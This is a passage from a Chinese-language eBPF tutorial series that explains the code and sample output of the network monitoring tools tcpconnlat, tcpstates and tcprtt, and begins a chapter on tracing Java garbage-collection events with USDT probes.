|
||
<p>首先,让我们详细看一下主轮询循环:</p>
|
||
<pre><code class="language-c"> /* main: poll */
|
||
while (!exiting) {
|
||
err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
|
||
if (err < 0 && err != -EINTR) {
|
||
fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err));
|
||
goto cleanup;
|
||
}
|
||
/* reset err to return 0 if exiting */
|
||
err = 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志<code>exiting</code>。</p>
|
||
<p>接下来,让我们来看看<code>handle_event</code>函数,这个函数将处理从内核发送到用户态的每一个eBPF事件:</p>
|
||
<pre><code class="language-c">void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
|
||
const struct event* e = data;
|
||
char src[INET6_ADDRSTRLEN];
|
||
char dst[INET6_ADDRSTRLEN];
|
||
union {
|
||
struct in_addr x4;
|
||
struct in6_addr x6;
|
||
} s, d;
|
||
static __u64 start_ts;
|
||
|
||
if (env.timestamp) {
|
||
if (start_ts == 0)
|
||
start_ts = e->ts_us;
|
||
printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0);
|
||
}
|
||
if (e->af == AF_INET) {
|
||
s.x4.s_addr = e->saddr_v4;
|
||
d.x4.s_addr = e->daddr_v4;
|
||
} else if (e->af == AF_INET6) {
|
||
memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr));
|
||
memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr));
|
||
} else {
|
||
fprintf(stderr, "broken event: event->af=%d", e->af);
|
||
return;
|
||
}
|
||
|
||
if (env.lport) {
|
||
printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid,
|
||
e->comm, e->af == AF_INET ? 4 : 6,
|
||
inet_ntop(e->af, &s, src, sizeof(src)), e->lport,
|
||
inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
|
||
e->delta_us / 1000.0);
|
||
} else {
|
||
printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm,
|
||
e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)),
|
||
inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
|
||
e->delta_us / 1000.0);
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p><code>handle_event</code>函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个<code>event</code>结构体,包含了之前在内核态计算得到的TCP连接的信息。</p>
|
||
<p>首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。</p>
|
||
<p>最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。</p>
|
||
<h2 id="编译运行-2"><a class="header" href="#编译运行-2">编译运行</a></h2>
|
||
<pre><code class="language-console">$ make
|
||
...
|
||
BPF .output/tcpconnlat.bpf.o
|
||
GEN-SKEL .output/tcpconnlat.skel.h
|
||
CC .output/tcpconnlat.o
|
||
BINARY tcpconnlat
|
||
$ sudo ./tcpconnlat
|
||
PID COMM IP SADDR DADDR DPORT LAT(ms)
|
||
222564 wget 4 192.168.88.15 110.242.68.3 80 25.29
|
||
222684 wget 4 192.168.88.15 167.179.101.42 443 246.76
|
||
222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17
|
||
222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31
|
||
</code></pre>
|
||
<p>源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat</a></p>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c">tcpconnlat</a></li>
|
||
</ul>
|
||
<h2 id="总结-11"><a class="header" href="#总结-11">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。</p>
|
||
<p>我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。</p>
|
||
<p>在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,例如如何使用 eBPF 来追踪网络包的传输路径,如何利用 eBPF 对系统的性能进行细粒度的监控等等。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf入门实践教程十四记录-tcp-连接状态与-tcp-rtt"><a class="header" href="#ebpf入门实践教程十四记录-tcp-连接状态与-tcp-rtt">eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:<code>tcpstates</code> 和 <code>tcprtt</code>。<code>tcpstates</code> 用于记录 TCP 连接的状态变化,而 <code>tcprtt</code> 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。</p>
|
||
<h2 id="tcprtt-与-tcpstates"><a class="header" href="#tcprtt-与-tcpstates"><code>tcprtt</code> 与 <code>tcpstates</code></a></h2>
|
||
<p>网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 <code>tcprtt</code> 这个工具。<code>tcprtt</code> 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。</p>
|
||
<p>当 TCP 链接建立时,<code>tcprtt</code> 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,<code>tcprtt</code> 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,<code>tcprtt</code> 会通过用户态代码,将收集的信息以图形化的方式展示给用户。</p>
|
||
<p><code>tcpstates</code> 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,<code>tcpstates</code> 可以打印出类似以下的输出:</p>
|
||
<pre><code class="language-sh">SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS
|
||
ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000
|
||
ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373
|
||
ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042
|
||
ffff9fd7e819
|
||
|
||
2000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536
|
||
ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006
|
||
</code></pre>
|
||
<p>以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。</p>
|
||
<p>在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。</p>
|
||
<h2 id="tcpstate"><a class="header" href="#tcpstate">tcpstate</a></h2>
|
||
<p>由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码:</p>
|
||
<pre><code class="language-c">const volatile bool filter_by_sport = false;
|
||
const volatile bool filter_by_dport = false;
|
||
const volatile short target_family = 0;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u16);
|
||
__type(value, __u16);
|
||
} sports SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u16);
|
||
__type(value, __u16);
|
||
} dports SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, struct sock *);
|
||
__type(value, __u64);
|
||
} timestamps SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(__u32));
|
||
__uint(value_size, sizeof(__u32));
|
||
} events SEC(".maps");
|
||
|
||
SEC("tracepoint/sock/inet_sock_set_state")
|
||
int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
|
||
{
|
||
struct sock *sk = (struct sock *)ctx->skaddr;
|
||
__u16 family = ctx->family;
|
||
__u16 sport = ctx->sport;
|
||
__u16 dport = ctx->dport;
|
||
__u64 *tsp, delta_us, ts;
|
||
struct event event = {};
|
||
|
||
if (ctx->protocol != IPPROTO_TCP)
|
||
return 0;
|
||
|
||
if (target_family && target_family != family)
|
||
return 0;
|
||
|
||
if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport))
|
||
return 0;
|
||
|
||
if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport))
|
||
return 0;
|
||
|
||
tsp = bpf_map_lookup_elem(&timestamps, &sk);
|
||
ts = bpf_ktime_get_ns();
|
||
if (!tsp)
|
||
delta_us = 0;
|
||
else
|
||
delta_us = (ts - *tsp) / 1000;
|
||
|
||
event.skaddr = (__u64)sk;
|
||
event.ts_us = ts / 1000;
|
||
event.delta_us = delta_us;
|
||
event.pid = bpf_get_current_pid_tgid() >> 32;
|
||
event.oldstate = ctx->oldstate;
|
||
event.newstate = ctx->newstate;
|
||
event.family = family;
|
||
event.sport = sport;
|
||
event.dport = dport;
|
||
bpf_get_current_comm(&event.task, sizeof(event.task));
|
||
|
||
if (family == AF_INET) {
|
||
bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr);
|
||
bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr);
|
||
} else { /* family == AF_INET6 */
|
||
bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
|
||
|
||
if (ctx->newstate == TCP_CLOSE)
|
||
bpf_map_delete_elem(&timestamps, &sk);
|
||
else
|
||
bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p><code>tcpstates</code>主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。</p>
|
||
<h3 id="定义-bpf-maps"><a class="header" href="#定义-bpf-maps">定义 BPF Maps</a></h3>
|
||
<p>在<code>tcpstates</code>程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。<code>sports</code>和<code>dports</code>分别用于存储源端口和目标端口,用于过滤 TCP 连接;<code>timestamps</code>用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;<code>events</code>则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。</p>
|
||
<h3 id="追踪-tcp-连接状态变化"><a class="header" href="#追踪-tcp-连接状态变化">追踪 TCP 连接状态变化</a></h3>
|
||
<p>程序定义了一个名为<code>handle_set_state</code>的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到<code>sock/inet_sock_set_state</code>这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行<code>handle_set_state</code>函数。</p>
|
||
<p>在<code>handle_set_state</code>函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从<code>timestamps</code>map 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过<code>bpf_perf_event_output</code>函数将该 event 发送到用户态。</p>
|
||
<h3 id="更新时间戳"><a class="header" href="#更新时间戳">更新时间戳</a></h3>
|
||
<p>最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从<code>timestamps</code>map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。</p>
|
||
<p>用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据:</p>
|
||
<pre><code class="language-c">static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
|
||
char ts[32], saddr[26], daddr[26];
|
||
struct event* e = data;
|
||
struct tm* tm;
|
||
int family;
|
||
time_t t;
|
||
|
||
if (emit_timestamp) {
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
printf("%8s ", ts);
|
||
}
|
||
|
||
inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr));
|
||
inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr));
|
||
if (wide_output) {
|
||
family = e->family == AF_INET ? 4 : 6;
|
||
printf(
|
||
"%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s "
|
||
"%.3f\n",
|
||
e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr,
|
||
e->dport, tcp_states[e->oldstate], tcp_states[e->newstate],
|
||
(double)e->delta_us / 1000);
|
||
} else {
|
||
printf(
|
||
"%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n",
|
||
e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport,
|
||
tcp_states[e->oldstate], tcp_states[e->newstate],
|
||
(double)e->delta_us / 1000);
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p><code>handle_event</code>就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。</p>
|
||
<p>在<code>handle_event</code>函数中,我们首先通过<code>inet_ntop</code>函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。</p>
|
||
<p>这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。</p>
|
||
<p>总结起来,用户态部分的处理主要涉及到了以下几个步骤:</p>
|
||
<ol>
|
||
<li>使用 libbpf 加载并运行 eBPF 程序。</li>
|
||
<li>设置回调函数来接收内核发送的事件。</li>
|
||
<li>处理接收到的事件,将其转换成人类可读的格式并打印。</li>
|
||
</ol>
|
||
<p>以上就是<code>tcpstates</code>程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。</p>
|
||
<h3 id="tcprtt"><a class="header" href="#tcprtt">tcprtt</a></h3>
|
||
<p>在本章节中,我们将分析<code>tcprtt</code> eBPF 程序的内核态代码。<code>tcprtt</code>是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。</p>
|
||
<pre><code class="language-c">
|
||
/// @sample {"interval": 1000, "type" : "log2_hist"}
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u64);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
SEC("fentry/tcp_rcv_established")
|
||
int BPF_PROG(tcp_rcv, struct sock *sk)
|
||
{
|
||
const struct inet_sock *inet = (struct inet_sock *)(sk);
|
||
struct tcp_sock *ts;
|
||
struct hist *histp;
|
||
u64 key, slot;
|
||
u32 srtt;
|
||
|
||
if (targ_sport && targ_sport != inet->inet_sport)
|
||
return 0;
|
||
if (targ_dport && targ_dport != sk->__sk_common.skc_dport)
|
||
return 0;
|
||
if (targ_saddr && targ_saddr != inet->inet_saddr)
|
||
return 0;
|
||
if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr)
|
||
return 0;
|
||
|
||
if (targ_laddr_hist)
|
||
key = inet->inet_saddr;
|
||
else if (targ_raddr_hist)
|
||
key = inet->sk.__sk_common.skc_daddr;
|
||
else
|
||
key = 0;
|
||
histp = bpf_map_lookup_or_try_init(&hists, &key, &zero);
|
||
if (!histp)
|
||
return 0;
|
||
ts = (struct tcp_sock *)(sk);
|
||
srtt = BPF_CORE_READ(ts, srtt_us) >> 3;
|
||
if (targ_ms)
|
||
srtt /= 1000U;
|
||
slot = log2l(srtt);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
__sync_fetch_and_add(&histp->slots[slot], 1);
|
||
if (targ_show_ext) {
|
||
__sync_fetch_and_add(&histp->latency, srtt);
|
||
__sync_fetch_and_add(&histp->cnt, 1);
|
||
}
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>首先,我们定义了一个 hash 类型的 eBPF map,名为<code>hists</code>,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个<code>hist</code>结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。</p>
|
||
<p>接着,我们定义了一个 eBPF 程序,名为<code>tcp_rcv</code>,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在<code>hists</code> map 中查找或者初始化对应的 histogram。</p>
|
||
<p>接下来,我们读取 TCP 连接的<code>srtt_us</code>字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。</p>
|
||
<p>如果设置了<code>show_ext</code>参数,我们还会将 RTT 值和计数器累加到 histogram 的<code>latency</code>和<code>cnt</code>字段中。</p>
|
||
<p>通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。</p>
|
||
<p>总结起来,<code>tcprtt</code> eBPF 程序的主要逻辑包括以下几个步骤:</p>
|
||
<ol>
|
||
<li>根据过滤条件对 TCP 连接进行过滤。</li>
|
||
<li>在<code>hists</code> map 中查找或者初始化对应的 histogram。</li>
|
||
<li>读取 TCP 连接的<code>srtt_us</code>字段,并将其转换为对数形式,存储到 histogram 中。</li>
|
||
<li>如果设置了<code>show_ext</code>参数,将 RTT 值和计数器累加到 histogram 的<code>latency</code>和<code>cnt</code>字段中。</li>
|
||
</ol>
|
||
<p>tcprtt 挂载到了内核态的 tcp_rcv_established 函数上:</p>
|
||
<pre><code class="language-c">void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
|
||
</code></pre>
|
||
<p>这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于<code>ESTABLISHED</code>状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用:</p>
|
||
<ul>
|
||
<li>我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。</li>
|
||
<li>收到了乱序的数据包。</li>
|
||
<li>期待接收紧急数据。</li>
|
||
<li>没有剩余的缓冲区空间。</li>
|
||
<li>接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。</li>
|
||
<li>数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。</li>
|
||
<li>接收到了意外的TCP选项。</li>
|
||
</ul>
|
||
<p>当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在<code>tcp_data_queue</code>函数中被开启。</p>
|
||
<h2 id="编译运行-3"><a class="header" href="#编译运行-3">编译运行</a></h2>
|
||
<p>对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用:</p>
|
||
<pre><code class="language-console">$ make
|
||
...
|
||
BPF .output/tcpstates.bpf.o
|
||
GEN-SKEL .output/tcpstates.skel.h
|
||
CC .output/tcpstates.o
|
||
BINARY tcpstates
|
||
$ sudo ./tcpstates
|
||
SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000
|
||
ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794
|
||
ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793
|
||
ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086
|
||
ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193
|
||
ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000
|
||
ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763
|
||
ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000
|
||
</code></pre>
|
||
<p>对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子:</p>
|
||
<p>Compile:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc runqlat.bpf.c runqlat.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>运行:</p>
|
||
<pre><code class="language-console">$ sudo ecli run package.json -h
|
||
A simple eBPF program
|
||
|
||
|
||
Usage: package.json [OPTIONS]
|
||
|
||
Options:
|
||
--verbose Whether to show libbpf debug information
|
||
--targ_laddr_hist Set value of `bool` variable targ_laddr_hist
|
||
--targ_raddr_hist Set value of `bool` variable targ_raddr_hist
|
||
--targ_show_ext Set value of `bool` variable targ_show_ext
|
||
--targ_sport <targ_sport> Set value of `__u16` variable targ_sport
|
||
--targ_dport <targ_dport> Set value of `__u16` variable targ_dport
|
||
--targ_saddr <targ_saddr> Set value of `__u32` variable targ_saddr
|
||
--targ_daddr <targ_daddr> Set value of `__u32` variable targ_daddr
|
||
--targ_ms Set value of `bool` variable targ_ms
|
||
-h, --help Print help
|
||
-V, --version Print version
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
|
||
$ sudo ecli run package.json
|
||
key = 0
|
||
latency = 0
|
||
cnt = 0
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 0 | |
|
||
512 -> 1023 : 4 |******************** |
|
||
1024 -> 2047 : 1 |***** |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 8 |****************************************|
|
||
|
||
key = 0
|
||
latency = 0
|
||
cnt = 0
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 0 | |
|
||
512 -> 1023 : 11 |*************************** |
|
||
1024 -> 2047 : 1 |** |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 16 |****************************************|
|
||
8192 -> 16383 : 4 |********** |
|
||
</code></pre>
|
||
<p>完整源代码:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/14-tcpstates">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/14-tcpstates</a></li>
|
||
</ul>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt">tcpstates</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py">tcprtt</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpstates.bpf.c">libbpf-tools/tcpstates</a></li>
|
||
</ul>
|
||
<h2 id="总结-12"><a class="header" href="#总结-12">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程十五使用-usdt-捕获用户态-java-gc-事件耗时"><a class="header" href="#ebpf-入门实践教程十五使用-usdt-捕获用户态-java-gc-事件耗时">eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。</p>
|
||
<p>在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。</p>
|
||
<h2 id="usdt-介绍"><a class="header" href="#usdt-介绍">USDT 介绍</a></h2>
|
||
<p>USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。</p>
|
||
<h3 id="用户层面的追踪机制用户级动态跟踪和-usdt"><a class="header" href="#用户层面的追踪机制用户级动态跟踪和-usdt">用户层面的追踪机制:用户级动态跟踪和 USDT</a></h3>
|
||
<p>在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 <code>dispatch_command()</code> 函数上进行插桩,来跟踪服务器的查询请求:</p>
|
||
<pre><code class="language-bash"># ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string'
|
||
Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end.
|
||
mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables"
|
||
